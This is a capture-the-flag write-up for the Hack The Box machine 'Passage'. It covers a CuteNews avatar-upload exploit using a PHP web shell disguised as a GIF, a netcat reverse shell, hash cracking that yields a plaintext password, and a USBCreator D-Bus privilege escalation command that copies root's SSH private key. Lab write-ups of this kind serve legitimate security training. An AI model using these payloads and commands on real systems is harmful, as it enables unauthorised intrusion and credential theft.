Passage [HTB] Write-up + custom python-exploit w/o msfconsole

Target

• Name: Passage [Hack the box]
• IP: 10.10.10.206
• OS: Linux
• Difficulty: medium

Used tools:

• Kali Linux-2020.3 (Vmware Workstation)
• Nmap
• Firefox
• Netcat
• Python Script/Php
• gdbus for privilege escalation

Parte One: Enumeration

First of all, Make sure to be connected to the “Hack the box” VPN then we are ready to start nmap

sudo nmap -T4 -sS -A -Pn 10.10.10.206

Cool, there is a web server running on this machine on port 80, fire up firefox and search for http://10.10.10.206/
We landed on the home page, the first News is Implemented Fail2Ban, after too many requests on this website our IP gets a ban. I run Gobuster and I got banned for 2 minutes lol it doesn't lie.

after some research on the website I found out that it is powered by CuteNews CMS, so I searched for the login panel.

I made some research on google about this CMS and I found several vulnerabilities. For example, we can register and automatically log in and change our profile picture.

then you can upload a Php script in image/gif format and you can execute commands on the webserver, so I decided to create a Python script to automate this process.

Python Script

This python script allows you to register and login inside CuteNews, change the image profile with a PHP script masked as a gif file, and then get inside the machine. Simple right? I took some inspiration from CVE-20199–11447 and now I will explain to you how it works.
You can find my personal code on Github: https://github.com/Andrxid/Passage_HTB_exploit

Register Function

This is the most important part of the script. To create this function you need the “data” from the website, these are the values required for the user registration. you can find them using a proxy like burp and capture the requests. In this case, it will generate a random password, user, and email.

Log In function

The process of making this is pretty the same for the registration part.

Function Payload

This function takes the PHP script I made and makes the custom settings for our profile, such as the fake profile photo, and get the image link for the user which contains the payload.

The PHP script is very easy, it accepts user input from the link and I added the “GIF8;” to make it acceptable as an image.

GIF8;
<?php system($_REQUEST['cmd']) ?>

moreover, I created two threads with two functions, the bash function that simply calls a netcat listener and the request function that uses a get request at the image link with PHP file to call my netcat listener.

there are also a init function and a run function, you can find out on the Github link.

Part Two: Exploitation

After creating our script we can run it and get inside the machine quickly.

Run the python script and insert the target URL!

python3.9 exploit.py

the script will ask if we have already an account, in this case, we select no.

it will generate a random one and automatically login to the website and upload our custom PHP script.

to make the connection give the script your IP listener in order to set your listener up and there you go!

TTY shell

To obtain a TTY shell run this command

python3 -c 'import pty;pty.spawn("/bin/bash")';

after some research, I go to the data folder “cdata” that contains: news, users, plugins, btree, backup, log.

in the users' folder, there are many files so let’s cat them all

cat * 

these are base64 encoded, after a lot of decryption I found something interesting in this one

use this command to decode on your terminal

echo "YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19" | base64 -d

the output seems to be information on Paul coles, Paul is also a user of the machine. There is a password encrypted, I used cyberchef to detect the hash type.

it’s SHA-256. Let’s crack it!

hashcat -m 1400 hash -w rockyou.txt

paul credentials are: paul:atlanta1

type:

su paul

now we are paul and we can read the user.txt.

cat user.txt

this part is pretty easy, we can use id_rsa key to log in as nadav in ssh

ssh nadav@10.10.10.206

now we are nadav!!

Part Three: Privilege escalation-root

run

ps aux

Ps aux will prompt all running process and we can see that some are under root for example:

root       2388  0.0  0.4 235548 20020 ?        Sl   00:25   0:00 /usr/bin/python3 /usr/share/usb-creator/usb-creator-helper

The vulnerability is discussed in details in this post:

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

use this command in the tmp folder cd /tmp:

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/key true

this command will generate the ssh key for root

now copy it and use it to ssh in as root.

Easy man, you obtained the root flag!

If you have any questions or suggestions do not hesitate to contact me

Thanks for reading this and good hacking!